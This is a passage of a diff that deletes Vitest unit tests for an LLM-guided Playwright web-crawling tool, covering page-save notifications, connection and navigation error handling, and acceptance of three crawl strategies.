-    it("notifies on page save", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [{ tool: "click", args: { selector: "a" } }],
-          reasoning: "Exploring",
-          goalProgress: "Exploring",
-          goalComplete: false,
-        },
-      }).mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      vi.clearAllMocks();
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-      });
-      // Multiple notifications: crawl create, page save, completion
-      expect(context.resourceManager.notifyListChanged).toHaveBeenCalled();
-    });
-  });
-  describe("handler - error handling", () => {
-    it("handles playwright connection errors", async () => {
-      context.playwrightClient.isConnected = vi.fn().mockReturnValue(false);
-      context.playwrightClient.connect = vi.fn().mockRejectedValue(
-        new Error("Connection failed")
-      );
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-      });
-      expect(result.isError).toBe(true);
-      expect(result.content[0].text).toContain("Error");
-    });
-    it("handles navigation errors", async () => {
-      context.playwrightClient.navigate = vi.fn().mockRejectedValue(
-        new Error("Navigation timeout")
-      );
-      await context.playwrightClient.connect();
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-      });
-      expect(result.isError).toBe(true);
-    });
-  });
-  describe("handler - strategy", () => {
-    beforeEach(async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      await context.playwrightClient.connect();
-    });
-    it("accepts goal_directed strategy", async () => {
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-        strategy: "goal_directed",
-      });
-      expect(result.isError).toBeFalsy();
-    });
-    it("accepts breadth_first strategy", async () => {
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-        strategy: "breadth_first",
-      });
-      expect(result.isError).toBeFalsy();
-    });
-    it("accepts depth_first strategy", async () => {
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-        strategy: "depth_first",
-      });
-      expect(result.isError).toBeFalsy();
-    });
-  });
-});